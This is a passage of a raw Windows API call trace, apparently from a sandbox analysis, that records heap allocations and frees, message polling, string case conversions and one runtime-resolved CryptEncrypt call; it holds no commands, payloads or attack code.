(HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0190.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0190.743] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0190.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0190.743] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0190.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0190.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0190.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.743] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0190.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0190.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0190.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.744] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0190.744] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0190.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0190.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0190.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0190.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0190.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0190.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0190.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0190.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0190.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0190.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0190.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0190.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24e24c8 | out: hHeap=0x25c0000) returned 1 [0190.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0190.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0190.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0190.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0190.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0190.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.746] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0190.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0190.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0190.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0190.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0190.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0190.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0190.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0190.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0190.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0190.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0190.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0190.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0190.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0190.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0190.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0190.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0190.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0190.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0190.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0190.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0190.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0190.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0190.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0190.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24a9e58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0190.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0190.748] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0190.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0190.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0190.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0190.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0190.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0190.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0190.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0190 | out: hHeap=0x25c0000) returned 1 [0190.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0190.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01c0 | out: hHeap=0x25c0000) returned 1 [0190.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0190.748] CryptEncrypt (in: hKey=0xaa58a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x552a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x5530) returned 1 [0190.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0190.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0190.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01c0 [0190.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0190.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0190.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0190.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0190.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0190.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0190.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0190.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0190.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0190.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0190.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0190.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0190.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0190.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0190.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0190.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0190.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0190.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0190.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0190.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0190.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0190.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0190.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0190.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0190.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0190.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0190.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0190.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0190.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0190.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0190.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0190.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0190.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0190.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0190.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0190.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0190.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0190.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0190.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0190.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0190.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0190.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0190.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0190.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0190.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0190.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0190.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0190.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0190.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0190.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0190.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0190.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0190.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0190.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0190.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0190.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0190.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0190.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0190.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0190.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0190.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0190.751] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0190.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0190.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0190.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0190.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0190.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0190.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0190.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0190.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0190.751] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.752] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0190.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0190.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0190.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0190.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0190.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0190.752] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0190.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0190.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0190.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0190.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0190.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0190.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0190.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0190.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0190.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0190.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0190.752] CharLowerBuffW (in: lpsz="byte[21808]", cchLength=0xb | out: lpsz="byte[21808]") returned 0xb [0190.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0190.753] RtlAllocateHeap (HeapHandle=0x25c0000, 